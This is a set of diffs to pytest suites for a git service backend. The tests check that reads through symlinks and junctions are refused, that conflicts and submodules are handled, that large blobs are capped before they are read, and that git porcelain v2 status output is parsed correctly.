+    assert (outside / "keys.txt").read_text(encoding="utf-8") == f"{SECRET}\n"
+
+
+@pytest.mark.skipif(sys.platform != "win32", reason="junctions are Windows'")
+async def test_unstage_all_leaves_what_a_junction_reaches_alone(repo,
+                                                                tmp_path):
+    """The same filter on the third whole-tree write.
+
+    ``notes/keys.txt`` is in the index only because it was staged before
+    the guard existed (git will do it: ``update-index --add`` names the
+    path git itself reported). Unstaging it would be a write through the
+    junction like any other, so it is skipped and reported.
+    """
+    outside = _folder_outside(tmp_path)
+    _junction_or_skip(repo.root / "notes", outside)
+    repo.git("add", "-A", "--", ".")
+
+    result = await repo.service.unstage(all_paths=True)
+
+    assert result.detail["skipped"] == ["notes/keys.txt"]
+    assert [entry.path for entry in result.status.staged] == ["notes/keys.txt"]
 
 
 async def test_discarding_a_tracked_symlink_file_itself_still_works(repo):

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -25,6 +25,7 @@ import asyncio
 import os
 import shutil
 import subprocess
+import sys
 import threading
 from pathlib import Path
 
@@ -1302,16 +1303,61 @@ async def test_a_worktree_read_never_follows_a_symbolic_link(repo):
 
 
 async def test_a_worktree_read_through_a_linked_folder_is_refused(repo):
-    """A link ANYWHERE in the path counts, not only as its last segment."""
-    secrets = repo.root.parent / "outside"
-    secrets.mkdir()
-    (secrets / "keys.txt").write_text(f"{SECRET}\n", encoding="utf-8")
-    _link(secrets, repo.root / "linked")
-    repo.write("keep.txt", "keep\n")
-    repo.commit("a link to a folder")
+    """A link ANYWHERE in the path counts, not only as its last segment.
+
+    The link points INSIDE the repository on purpose. A link that pointed
+    out of it would be refused by ``validate_rel_path``'s containment check
+    -- which is a different rule, and would leave this one untested.
+    """
+    repo.write("sub/keys.txt", f"{SECRET}\n")
+    _link(repo.root / "sub", repo.root / "linked")
+    repo.commit("a link to a folder inside the project")
 
     with pytest.raises(GitError) as excinfo:
         await repo.service.file_at_ref("linked/keys.txt", "worktree")
+
+    assert _error(excinfo).code == "invalid_path"
+    assert "symbolic link" in (_error(excinfo).hint or "")
+
+
+@pytest.mark.parametrize("blobs", [False, True])
+async def test_a_worktree_diff_through_a_linked_folder_is_refused(repo, blobs):
+    """The diff reads the file on disk too -- both branches of it.
+
+    An untracked path becomes ``diff --no-index -- /dev/null <path>``, which
+    prints the WHOLE file; a tracked one is read to be diffed. Guarding only
+    ``file_at_ref`` left this route serving what the link pointed at.
+    """
+    repo.write("sub/keys.txt", f"{SECRET}\n")
+    _link(repo.root / "sub", repo.root / "linked")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff("linked/keys.txt", "worktree", blobs=blobs)
+
+    assert _error(excinfo).code == "invalid_path"
+
+
+@pytest.mark.skipif(sys.platform != "win32", reason="junctions are Windows'")
+@pytest.mark.parametrize("blobs", [False, True])
+async def test_a_worktree_diff_through_a_junction_is_refused(repo, blobs):
+    """A junction is a redirection that is NOT a symbolic link.
+
+    ``Path.is_symlink`` answers False for one and git follows it like any
+    directory, so the per-component walk cannot see it -- the
+    resolved-against-lexical comparison is what does. Measured on this box:
+    ``mklink /J`` over a folder of secrets made ``diff`` serve them.
+    """
+    repo.write("secrets/keys.txt", f"{SECRET}\n")
+    made = subprocess.run(
+        ["cmd", "/c", "mklink", "/J", str(repo.root / "notes"),
+         str(repo.root / "secrets")], capture_output=True)
+    if made.returncode != 0:
+        pytest.skip("this box would not create a junction")
+    assert not (repo.root / "notes").is_symlink(), (
+        "a junction that is_symlink CAN see needs no second check")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff("notes/keys.txt", "worktree", blobs=blobs)
 
     assert _error(excinfo).code == "invalid_path"
 
@@ -1348,6 +1394,154 @@ async def test_an_ordinary_file_beside_a_link_still_reads(repo):
 
     assert (await repo.service.file_at_ref("plain.txt",
                                            "worktree")).text == "ordinary\n"
+
+
+# --- a file in a conflict is still a file ------------------------------------
+
+
+def _conflicted(repo: Repo) -> Repo:
+    """Leave *repo* mid-merge, with ``a.txt`` unmerged in the index."""
+    repo.commit("base", {"a.txt": "base\n"})
+    repo.git("checkout", "-q", "-b", "side")
+    repo.commit("side", {"a.txt": "side\n"})
+    repo.git("checkout", "-q", "main")
+    repo.commit("main", {"a.txt": "main\n"})
+    failed = subprocess.run(
+        ["git", "-C", str(repo.root), "merge", "--no-ff", "-m", "merge",
+         "side"], capture_output=True)
+    assert failed.returncode != 0, "the fixture was meant to conflict"
+    return repo
+
+
+async def test_a_conflicted_file_still_diffs_in_the_worktree(repo):
+    """The regression this round is about.
+
+    An unmerged path has no stage-0 entry and is listed once PER STAGE, so a
+    check that refused "more than one index entry for this path" called the
+    file a directory -- and a conflicted file is the one a user most wants
+    to look at.
+    """
+    _conflicted(repo)
+
+    response = await repo.service.diff("a.txt", "worktree")
+
+    assert "<<<<<<<" in response.patch
+    assert response.binary is False
+
+
+async def test_a_conflicted_file_still_diffs_in_the_index(repo):
+    """git's own answer for this one is a single line, and it is the truth:
+    the index has three versions and no staged one."""
+    _conflicted(repo)
+
+    response = await repo.service.diff("a.txt", "index")
+
+    assert "Unmerged path a.txt" in response.patch
+
+
+async def test_a_conflicted_file_read_from_the_index_is_a_409(repo):
+    """"The index version" is a question with no answer during a conflict --
+    there are three of them -- so it is a state to report, not a missing
+    object (which is what the 500 before this said)."""
+    _conflicted(repo)
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.file_at_ref("a.txt", "index")
+
+    assert _error(excinfo).code == "conflict"
+    assert _error(excinfo).status == 409
+
+
+async def test_a_conflicted_diff_with_blobs_says_why_it_cannot(repo):
+    """The documented choice: ``blobs=True`` on a conflicted file is the
+    same 409, not a patch with two empty sides. A side-by-side view has no
+    two sides here, and the tab can ask again without the blobs."""
+    _conflicted(repo)
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff("a.txt", "worktree", blobs=True)
+
+    assert _error(excinfo).code == "conflict"
+
+
+async def test_a_conflict_does_not_disturb_the_log_or_a_commits_files(repo):
+    """The read paths that never look at the index at all."""
+    _conflicted(repo)
+
+    page = await repo.service.log(limit=5)
+    files = await repo.service.commit_files(page.commits[0].sha)
+
+    assert page.commits[0].subject == "main"
+    assert [entry.path for entry in files] == ["a.txt"]
+
+
+@pytest.mark.parametrize("scope", ["worktree", "index"])
+async def test_a_directory_and_file_conflict_is_still_refused(repo, scope):
+    """The shape the loosened rule must NOT let through.
+
+    One branch makes ``sub`` a file, the other a folder of secrets; the
+    merge conflicts. The set comparison is what refuses it -- the entries
+    the pathspec matches are ``{sub/keys.txt}``, which is not ``{sub}`` --
+    and in the worktree scope the directory on disk answers first.
+
+    (git 2.53 does not leave both names in the index: it moves the file side
+    aside as ``sub~HEAD``. So the shape that reaches this check is "entries
+    UNDER the path and none at it", which is the one that leaks if allowed.)
+    """
+    repo.git("checkout", "-q", "-b", "folder-side")
+    repo.commit("sub is a folder", {"sub/keys.txt": f"{SECRET}\n"})
+    repo.git("checkout", "-q", "main")
+    repo.commit("sub is a file", {"sub": "plain\n"})
+    failed = subprocess.run(
+        ["git", "-C", str(repo.root), "merge", "--no-ff", "-m", "merge",
+         "folder-side"], capture_output=True)
+    assert failed.returncode != 0, "the fixture was meant to conflict"
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff("sub", scope, blobs=True)
+
+    assert _error(excinfo).code == "invalid_path"
+
+
+# --- a submodule is another repository --------------------------------------
+
+
+def _with_gitlink(repo: Repo) -> Repo:
+    """Register ``sub`` as a gitlink whose commit this repository HAS.
+
+    A real submodule's commit lives in the other repository's object store,
+    which this one cannot read; using a local commit keeps the test about
+    the refusal rather than about a missing object.
+    """
+    sha = repo.head()
+    repo.git("update-index", "--add", "--cacheinfo", f"160000,{sha},sub")
+    return repo
+
+
+@pytest.mark.parametrize("scope", ["worktree", "index"])
+async def test_a_submodule_is_refused_by_name(repo, scope):
+    """Deliberately, and with the same sentence ``discard`` uses: what is at
+    that path is another repository, and every answer this tab could give
+    would be about the wrong one. It used to be refused by accident, as "a
+    directory in the index"."""
+    _with_gitlink(repo)
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff("sub", scope)
+
+    assert _error(excinfo).code == "invalid_path"
+    assert "submodule" in (_error(excinfo).hint or "")
+
+
+async def test_a_submodule_is_refused_in_a_commit_too(repo):
+    _with_gitlink(repo)
+    repo.git("commit", "-q", "-m", "add the gitlink")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff("sub", "commit", sha=repo.head())
+
+    assert _error(excinfo).code == "invalid_path"
+    assert "submodule" in (_error(excinfo).hint or "")
 
 
 async def test_an_unknown_diff_scope_is_refused(repo):

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -516,12 +516,21 @@ async def test_init_works_inside_another_repository(make_repo):
 
 
 async def test_init_on_a_missing_directory_is_a_404(tmp_path):
+    """One code, not "either of these two".
+
+    ``init`` is the write that runs when there is no repository, so the
+    state check lets it through and ``repo.init`` is what notices the
+    directory itself is not there. Accepting ``not_repo`` as well would let
+    that order change without anybody noticing -- and a 409 for a project
+    directory that does not exist is a different screen from a 404.
+    """
     service = GitService(project_dir=lambda: tmp_path / "not-there")
 
     with pytest.raises(GitError) as excinfo:
         await service.init()
 
-    assert _error(excinfo).code in ("not_found", "not_repo")
+    assert _error(excinfo).code == "not_found"
+    assert _error(excinfo).status == 404
 
 
 # --- stage / unstage --------------------------------------------------------

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -1783,20 +1783,78 @@ async def test_a_binary_file_comes_back_as_a_flag_not_as_mojibake(repo):
     assert content.size == len(data)
 
 
-async def test_a_file_past_the_cap_is_cut_and_says_how_big_it_was(
+async def test_a_file_on_disk_past_the_cap_is_cut_and_says_how_big_it_was(
         repo, monkeypatch):
     """``size`` is what git HAD, before the cut -- so a truncated response
     can still say what it truncated. The cap is patched down rather than fed
     two megabytes, which tests the same three lines in a tenth of a second.
+
+    The WORKTREE ref, because that is the read that still cuts: it opens the
+    file and stops one byte past the cap, so the prefix costs nothing. The
+    object-database read does not cut at all -- see the test below.
     """
     monkeypatch.setattr(diff_ops, "MAX_FILE_BYTES", 8)
     repo.commit("a long file", {"long.txt": "0123456789abcdef\n"})
 
-    content = await repo.service.file_at_ref("long.txt", "HEAD")
+    content = await repo.service.file_at_ref("long.txt", "worktree")
 
     assert content.truncated is True
     assert content.text == "01234567"
     assert content.size == 17
+
+
+async def test_a_blob_past_the_cap_is_never_read_at_all(repo, monkeypatch):
+    """The cap has to be applied BEFORE the read, not to its result.
+
+    ``cat-file blob`` writes the whole object down a pipe and this process
+    buffers all of it, so a repository holding a 231 MB file (measured) made
+    an open GET allocate 231 MB before a single byte could be thrown away --
+    a way to take the server down from a route that needs no token. Asking
+    ``cat-file -s`` first costs one cheap process and answers with the size
+    and the flag instead.
+
+    The assertion that matters is the negative one: the blob was never
+    asked for. ``size`` and ``truncated`` could be right by accident; a
+    recorded argv could not.
+    """
+    big = "x" * (diff_ops.MAX_FILE_BYTES + 1024)
+    repo.commit("a file nobody should read", {"big.txt": big})
+    asked: list[list[str]] = []
+    real_run_git = diff_ops.run_git
+
+    def recording(args, **kwargs):
+        asked.append(list(args))
+        return real_run_git(args, **kwargs)
+
+    monkeypatch.setattr(diff_ops, "run_git", recording)
+
+    content = await repo.service.file_at_ref("big.txt", "HEAD")
+
+    assert content.size == len(big)
+    assert content.truncated is True
+    assert content.text == ""
+    assert content.binary is False
+    assert ["cat-file", "-s", "HEAD:big.txt"] in asked
+    assert not any(args[:2] == ["cat-file", "blob"] for args in asked)
+
+
+async def test_a_diff_reports_an_over_large_side_rather_than_reading_it(
+        repo, monkeypatch):
+    """``blobs=True`` goes through the same reader, so it inherits the cap.
+
+    The patch itself is git's and is capped separately; what this pins is
+    that the side-by-side view of a huge file does not become the read the
+    cap exists to prevent.
+    """
+    monkeypatch.setattr(diff_ops, "MAX_FILE_BYTES", 8)
+    repo.commit("a long file", {"long.txt": "0123456789abcdef\n"})
+    repo.write("long.txt", "edited\n")
+
+    response = await repo.service.diff("long.txt", "worktree", blobs=True)
+
+    assert response.old_text == ""
+    assert response.old_missing is False
+    assert response.new_text == "edited\n"
 
 
 async def test_a_worktree_read_of_an_untracked_file_is_allowed(repo):

--- a/backend/tests/test_git_status_parser.py
+++ b/backend/tests/test_git_status_parser.py
@@ -1,0 +1,603 @@
+"""Reading git's own account of the working tree.
+
+Everything the Source Control tab draws comes from one status read, so a
+misread here is not a stack trace -- it is a file the user cannot see, a
+rename shown as a delete plus an add, or an "up to date" badge on a branch
+whose upstream was deleted last week. The parser is pure for exactly this
+reason: every one of those cases is a byte string, and a byte string can be
+written down.
+
+The fixtures are REAL output, captured from ``git status --porcelain=v2
+--branch --show-stash --untracked-files=all -z`` on git 2.53 against
+repositories built for each case -- including the ones that are awkward to
+produce on purpose (a copy record, delete-vs-modify, a submodule, an
+upstream deleted from under a tracking branch). The helpers below rebuild
+records of the same shape for the variations, and
+:func:`test_a_real_status_reads_the_way_git_printed_it` holds one capture
+verbatim so the helpers themselves are checked against git rather than
+against my memory of it.
+
+Non-ASCII paths are written as escapes so this file stays ASCII (a cp950
+console is a machine we support); ``-z`` plus ``core.quotepath=false`` means
+git hands over the bytes of a filename unaltered, so the CJK and the
+leading-space cases here are literally what the parser will see.
+"""
+
+from __future__ import annotations
+
+import pytest
+from pydantic import ValidationError
+
+from app.core.git.models import (
+    CommitRequest,
+    GitStatus,
+    IdentityRequest,
+    MutationResult,
+    PathsRequest,
+)
+from app.core.git.status import kind_from_letter, parse_porcelain_v2
+
+#: Object names, spelled out because a shortened one would not survive the
+#: field-counting this parser does.
+_OLD = "052d31effb03dcc923165ae3f6640bb6409b33cb"
+_NEW = "eeacbdb6b832e024b53d4148bf37fbb054e2f44d"
+_THIRD = "d709994d5213d86eb6a40c3124defc8349686627"
+_NONE = "0" * 40
+
+
+def payload(*tokens: str) -> bytes:
+    """The tokens as git writes them: NUL-TERMINATED, not NUL-separated.
+
+    The trailing NUL is git's, and it leaves an empty final token that the
+    parser has to ignore -- so every fixture here carries it.
+    """
+    return "".join(f"{token}\0" for token in tokens).encode("utf-8")
+
+
+def ordinary(xy: str, path: str, sub: str = "N...") -> str:
+    """A ``1`` record: a tracked file that was changed but not moved."""
+    return f"1 {xy} {sub} 100644 100644 100644 {_OLD} {_NEW} {path}"
+
+
+def moved(xy: str, score: str, path: str) -> str:
+    """A ``2`` record. The path it came FROM is the next token, not a field."""
+    return f"2 {xy} N... 100644 100644 100644 {_OLD} {_NEW} {score} {path}"
+
+
+def unmerged(xy: str, path: str) -> str:
+    """A ``u`` record: three stages of one conflicted file."""
+    return (f"u {xy} N... 100644 100644 100644 100644 "
+            f"{_OLD} {_NEW} {_THIRD} {path}")
+
+
+#: The headers of a repository on ``main`` with one commit and no remote.
+_ON_MAIN = (f"# branch.oid {_OLD}", "# branch.head main")
+
+
+# --- the branch headers ----------------------------------------------------
+
+
+def test_an_unborn_branch_has_a_name_but_no_commit():
+    """``git init`` then nothing: the tab still shows "main", and "unborn"
+    is what tells the service to unstage with ``rm --cached``."""
+    status = parse_porcelain_v2(payload("# branch.oid (initial)",
+                                        "# branch.head main"))
+
+    assert status.unborn is True
+    assert status.head is None
+    assert status.branch == "main"
+    assert status.detached is False
+
+
+def test_a_detached_head_has_a_commit_but_no_branch():
+    status = parse_porcelain_v2(payload(f"# branch.oid {_OLD}",
+                                        "# branch.head (detached)"))
+
+    assert status.detached is True
+    assert status.branch is None
+    assert status.head == _OLD
+    assert status.unborn is False
+
+
+def test_a_branch_without_an_upstream_counts_nothing():
+    status = parse_porcelain_v2(payload(*_ON_MAIN))
+
+    assert status.upstream is None
+    assert (status.ahead, status.behind) == (None, None)
+    assert status.upstream_gone is False
+
+
+def test_ahead_and_behind_come_from_the_ab_header():
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN, "# branch.upstream origin/main", "# branch.ab +3 -1"))
+
+    assert status.upstream == "origin/main"
+    assert (status.ahead, status.behind) == (3, 1)
+    assert status.upstream_gone is False
+
+
+def test_a_branch_in_sync_is_still_counted():
+    """``+0 -0`` is an answer, and it must not read as "no upstream"."""
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN, "# branch.upstream origin/main", "# branch.ab +0 -0"))
+
+    assert (status.ahead, status.behind) == (0, 0)
+    assert status.upstream_gone is False
+
+
+def test_an_upstream_with_no_counts_is_a_gone_upstream():
+    """A tracked remote branch that was deleted and pruned.
+
+    git keeps printing ``# branch.upstream`` and simply stops printing
+    ``# branch.ab`` (checked against git 2.53), so this pair -- configured
+    but uncounted -- is the whole signal porcelain v2 carries. Without it
+    the tab would show a branch with no counts as if it were in sync.
+    """
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN, "# branch.upstream origin/main"))
+
+    assert status.upstream == "origin/main"
+    assert (status.ahead, status.behind) == (None, None)
+    assert status.upstream_gone is True
+
+
+def test_half_an_ab_header_is_not_half_an_answer():
+    """A wrong number on a badge is worse than no badge."""
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN, "# branch.upstream origin/main", "# branch.ab +3"))
+
+    assert (status.ahead, status.behind) == (None, None)
+
+
+def test_the_stash_count_comes_from_its_header():
+    status = parse_porcelain_v2(payload(*_ON_MAIN, "# stash 2"))
+
+    assert status.stash_count == 2
+
+
+def test_no_stash_header_means_no_stashes():
+    """``--show-stash`` prints the line only when the stack is not empty."""
+    assert parse_porcelain_v2(payload(*_ON_MAIN)).stash_count == 0
+
+
+# --- one file, one group ---------------------------------------------------
+
+
+@pytest.mark.parametrize("xy,group,kind", [
+    pytest.param("A.", "staged", "added", id="added-to-the-index"),
+    pytest.param("M.", "staged", "modified", id="staged-edit"),
+    pytest.param("D.", "staged", "deleted", id="staged-delete"),
+    pytest.param("T.", "staged", "typechange", id="staged-typechange"),
+    pytest.param(".M", "unstaged", "modified", id="worktree-edit"),
+    pytest.param(".D", "unstaged", "deleted", id="worktree-delete"),
+    pytest.param(".T", "unstaged", "typechange", id="worktree-typechange"),
+])
+def test_a_letter_on_one_side_lands_in_one_group(xy, group, kind):
+    """``.`` is porcelain v2's "nothing happened on this side"."""
+    status = parse_porcelain_v2(payload(*_ON_MAIN, ordinary(xy, "a.txt")))
+
+    others = {"staged", "unstaged"} - {group}
+    entries = getattr(status, group)
+    assert [(f.path, f.kind, f.xy) for f in entries] == [("a.txt", kind, xy)]
+    assert all(getattr(status, name) == [] for name in others)
+    assert status.untracked == [] and status.conflicted == []
+
+
+def test_a_file_changed_on_both_sides_is_in_both_groups():
+    """The ``MM`` case, and the reason the two groups are built from X and Y
+    separately: the tab offers "unstage" and "discard" on the same file, and
+    both entries keep the full ``MM`` so the UI can say why."""
+    status = parse_porcelain_v2(payload(*_ON_MAIN, ordinary("MM", "both.txt")))
+
+    assert [(f.path, f.kind, f.xy) for f in status.staged] == [
+        ("both.txt", "modified", "MM")]
+    assert [(f.path, f.kind, f.xy) for f in status.unstaged] == [
+        ("both.txt", "modified", "MM")]
+
+
+def test_the_two_sides_can_disagree_about_what_happened():
+    """Staged as an edit, then deleted on disk: one file, two kinds."""
+    status = parse_porcelain_v2(payload(*_ON_MAIN, ordinary("MD", "a.txt")))
+
+    assert [f.kind for f in status.staged] == ["modified"]
+    assert [f.kind for f in status.unstaged] == ["deleted"]
+
+
+def test_an_untracked_file_carries_the_letters_git_omits():
+    """Porcelain v2 gives a ``?`` record no XY at all. Every other UI built
+    on git spells that state ``??``, and giving it the same two characters
+    here means nothing downstream needs a special case for one group."""
+    status = parse_porcelain_v2(payload(*_ON_MAIN, "? new.txt"))
+
+    assert [(f.path, f.kind, f.xy) for f in status.untracked] == [
+        ("new.txt", "untracked", "??")]
+    assert status.staged == [] and status.unstaged == []
+
+
+def test_an_ignored_entry_is_dropped():
+    """Only ``--ignored`` produces these, which we never pass -- and there
+    is no group for them, so they must not become untracked files."""
+    status = parse_porcelain_v2(payload(*_ON_MAIN, "! secret.env",
+                                        "? seen.txt"))
+
+    assert [f.path for f in status.untracked] == ["seen.txt"]
+
+
+# --- renames and copies ----------------------------------------------------
+
+
+def test_a_rename_remembers_where_it_came_from():
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN, moved("R.", "R100", "new.txt"), "old.txt"))
+
+    assert len(status.staged) == 1
+    entry = status.staged[0]
+    assert (entry.path, entry.orig_path) == ("new.txt", "old.txt")
+    assert (entry.kind, entry.xy, entry.score) == ("renamed", "R.", 100)
+    assert status.unstaged == []
+
+
+def test_a_copy_is_not_a_rename():
+    """``2 C.`` with the original still there: git prints this once copy
+    detection is on, and "copied" is a different sentence for the user."""
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN, moved("C.", "C75", "copied.txt"), "orig.txt"))
+
+    entry = status.staged[0]
+    assert (entry.kind, entry.orig_path, entry.score) == (
+        "copied", "orig.txt", 75)
+
+
+def test_only_the_moved_side_carries_the_old_path():
+    """``RM``: renamed in the index, then edited on disk. The worktree half
+    is an edit to the NEW path -- showing "old -> new" against it would say
+    the file had moved twice."""
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN, moved("RM", "R100", "new.txt"), "old.txt"))
+
+    staged, unstaged = status.staged[0], status.unstaged[0]
+    assert (staged.kind, staged.orig_path, staged.score) == (
+        "renamed", "old.txt", 100)
+    assert (unstaged.kind, unstaged.orig_path, unstaged.score) == (
+        "modified", None, None)
+    assert unstaged.path == "new.txt"
+
+
+def test_the_old_path_is_the_next_token_not_a_field():
+    """Both halves have spaces in them. Under ``-z`` the separator between
+    them is a NUL, which is the only reason this is unambiguous."""
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN,
+        moved("R.", "R087", "docs/new name.txt"), "docs/old name.txt",
+        "? untracked one.txt"))
+
+    entry = status.staged[0]
+    assert (entry.path, entry.orig_path) == (
+        "docs/new name.txt", "docs/old name.txt")
+    assert entry.score == 87
+    assert [f.path for f in status.untracked] == ["untracked one.txt"]
+
+
+# --- conflicts -------------------------------------------------------------
+
+
+@pytest.mark.parametrize("xy", ["UU", "AA", "DU", "UD", "DD"])
+def test_a_conflicted_file_keeps_its_letters(xy):
+    """All of these are one kind and several situations: ``DU`` is "we
+    deleted it, they changed it", where "keep ours" means "keep it deleted".
+    The resolve buttons come from ``xy``, so it has to survive."""
+    status = parse_porcelain_v2(payload(*_ON_MAIN, unmerged(xy, "both.txt")))
+
+    assert [(f.path, f.kind, f.xy) for f in status.conflicted] == [
+        ("both.txt", "conflict", xy)]
+    assert status.staged == [] and status.unstaged == []
+
+
+def test_a_conflict_does_not_hide_the_rest_of_the_status():
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN, ordinary("A.", "added.txt"), unmerged("AA", "both.txt"),
+        "? new.txt"))
+
+    assert [f.path for f in status.staged] == ["added.txt"]
+    assert [f.path for f in status.conflicted] == ["both.txt"]
+    assert [f.path for f in status.untracked] == ["new.txt"]
+
+
+# --- paths -----------------------------------------------------------------
+
+
+@pytest.mark.parametrize("path", [
+    pytest.param("src/main.py", id="ordinary"),
+    pytest.param("my notes/two words.txt", id="spaces"),
+    pytest.param(" leading.txt", id="leading-space"),
+    pytest.param("trailing .txt", id="inner-space"),
+    # No quoting anywhere in this pipeline, so a CJK name is an ordinary
+    # name -- it arrives as the bytes the filesystem holds.
+    pytest.param("\u8cc7\u6599/\u8a13\u7df4.csv", id="cjk"),
+    pytest.param("\u30c7\u30fc\u30bf/\u30e2\u30c7\u30eb.pt", id="kana"),
+    # Legal on every filesystem git supports, and the whole reason this
+    # parser splits on NUL rather than on newlines.
+    pytest.param("two\nlines.txt", id="newline"),
+])
+def test_a_path_survives_whatever_it_is_called(path):
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN, ordinary(".M", path), f"? {path}"))
+
+    assert [f.path for f in status.unstaged] == [path]
+    assert [f.path for f in status.untracked] == [path]
+
+
+def test_bytes_that_are_not_utf8_do_not_lose_the_status():
+    """A repository made on a cp950 machine has filenames that are not
+    UTF-8. One unreadable NAME must cost that name a replacement character,
+    not cost the user the panel."""
+    raw = payload(*_ON_MAIN, "? placeholder", "? seen.txt").replace(
+        b"placeholder", b"caf\xe9.txt")
+
+    status = parse_porcelain_v2(raw)
+
+    assert [f.path for f in status.untracked] == ["caf\ufffd.txt", "seen.txt"]
+
+
+# --- what git might say tomorrow -------------------------------------------
+
+
+def test_an_unknown_record_type_is_skipped_not_raised():
+    """A status read is the tab's heartbeat. If a future git grows a record
+    type, the cost of skipping it is one missing row; the cost of raising is
+    a panel that shows nothing and an error nobody can act on."""
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN, "9 something entirely new", ordinary(".M", "a.txt")))
+
+    assert [f.path for f in status.unstaged] == ["a.txt"]
+
+
+def test_a_truncated_record_is_skipped():
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN, "1 .M N... 100644", ordinary(".M", "a.txt")))
+
+    assert [f.path for f in status.unstaged] == ["a.txt"]
+
+
+def test_a_rename_missing_its_second_token_is_skipped():
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN, moved("R.", "R100", "new.txt")))
+
+    assert status.staged == []
+
+
+def test_output_that_stops_mid_record_is_not_an_index_error():
+    """The last token with no NUL after it -- a rename whose second token
+    never arrived. Not something git does, but this parser reads whatever a
+    process handed back, and running off the end of the token list would be
+    a traceback where a short status would do."""
+    raw = (payload(*_ON_MAIN)
+           + moved("R.", "R100", "new.txt").encode("utf-8"))
+
+    status = parse_porcelain_v2(raw)
+
+    assert status.staged == []
+    assert status.branch == "main"
+
+
+def test_a_submodule_is_an_ordinary_entry():
+    """The ``sub`` field stops being ``N...`` and the modes become
+    ``160000``; neither is a field this parser reads, and a submodule the
+    user changed still has to show up."""
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN,
+        f"1 .M SC.. 160000 160000 160000 {_OLD} {_NEW} vendor/sub"))
+
+    assert [(f.path, f.kind) for f in status.unstaged] == [
+        ("vendor/sub", "modified")]
+
+
+def test_empty_output_is_an_empty_status():
+    """git prints headers for every real status, so this is a "cannot
+    happen" -- and it still must not be a traceback."""
+    status = parse_porcelain_v2(b"")
+
+    assert status == GitStatus()
+
+
+def test_a_clean_repository_has_four_empty_lists():
+    status = parse_porcelain_v2(payload(
+        *_ON_MAIN, "# branch.upstream origin/main", "# branch.ab +0 -0"))
+
+    assert status.staged == []
+    assert status.unstaged == []
+    assert status.untracked == []
+    assert status.conflicted == []
+    assert status.stash_count == 0
+
+
+# --- the flags the parser cannot know --------------------------------------
+
+
+def test_the_in_progress_flags_default_to_false():
+    """Porcelain v2 says nothing about a merge or a rebase; the answer is
+    whether MERGE_HEAD / rebase-merge / rebase-apply exist, which needs a
+    git call the service makes right after this one."""
+    status = parse_porcelain_v2(payload(*_ON_MAIN))
+
+    assert status.merge_in_progress is False
+    assert status.rebase_in_progress is False
+
+
+def test_the_in_progress_flags_are_the_callers_to_set():
+    status = parse_porcelain_v2(payload(*_ON_MAIN, unmerged("UU", "a.txt")),
+                                merge_in_progress=True,
+                                rebase_in_progress=True)
+
+    assert status.merge_in_progress is True
+    assert status.rebase_in_progress is True
+
+
+# --- the whole thing, exactly as git printed it -----------------------------
+
+#: Captured from git 2.53 in a repository holding one of everything: a file
+#: added to the index, one edited in both places, one deleted on disk, one
+#: edited and staged, one edited on disk, a rename that was then edited, a
+#: staged delete, and an untracked file.
+_REAL_CAPTURE = (
+    "# branch.oid d8ae323989562f6475c4830b455e0027b0316eab",
+    "# branch.head main",
+    "1 A. N... 000000 100644 100644 "
+    "0000000000000000000000000000000000000000 "
+    "d2eb92c3f437753a118e0fb686bbc3d3bba96b63 added.txt",
+    "1 MM N... 100644 100644 100644 "
+    "052d31effb03dcc923165ae3f6640bb6409b33cb "
+    "eeacbdb6b832e024b53d4148bf37fbb054e2f44d both.txt",
+    "1 .D N... 100644 100644 000000 "
+    "052d31effb03dcc923165ae3f6640bb6409b33cb "
+    "052d31effb03dcc923165ae3f6640bb6409b33cb gone.txt",
+    "1 M. N... 100644 100644 100644 "
+    "052d31effb03dcc923165ae3f6640bb6409b33cb "
+    "60b8d2378999073340b43595a43455b277449738 keep.txt",
+    "1 .M N... 100644 100644 100644 "
+    "052d31effb03dcc923165ae3f6640bb6409b33cb "
+    "052d31effb03dcc923165ae3f6640bb6409b33cb mod.txt",
+    "2 RM N... 100644 100644 100644 "
+    "052d31effb03dcc923165ae3f6640bb6409b33cb "
+    "052d31effb03dcc923165ae3f6640bb6409b33cb R100 new.txt",
+    "old.txt",
+    "1 D. N... 100644 000000 000000 "
+    "052d31effb03dcc923165ae3f6640bb6409b33cb "
+    "0000000000000000000000000000000000000000 stagedgone.txt",
+    "? untracked one.txt",
+)
+
+
+def test_a_real_status_reads_the_way_git_printed_it():
+    """One capture, asserted whole: order included.
+
+    git sorts by path, and the tab lists files in the order they arrive, so
+    the order is part of the output too -- and this is the test that would
+    catch a field-counting mistake the helpers above and I made together.
+    """
+    status = parse_porcelain_v2(payload(*_REAL_CAPTURE))
+
+    assert status.branch == "main"
+    assert status.head == "d8ae323989562f6475c4830b455e0027b0316eab"
+    assert [(f.path, f.kind, f.xy) for f in status.staged] == [
+        ("added.txt", "added", "A."),
+        ("both.txt", "modified", "MM"),
+        ("keep.txt", "modified", "M."),
+        ("new.txt", "renamed", "RM"),
+        ("stagedgone.txt", "deleted", "D."),
+    ]
+    assert [(f.path, f.kind, f.xy) for f in status.unstaged] == [
+        ("both.txt", "modified", "MM"),
+        ("gone.txt", "deleted", ".D"),
+        ("mod.txt", "modified", ".M"),
+        ("new.txt", "modified", "RM"),
+    ]
+    assert [f.path for f in status.untracked] == ["untracked one.txt"]
+    assert status.conflicted == []
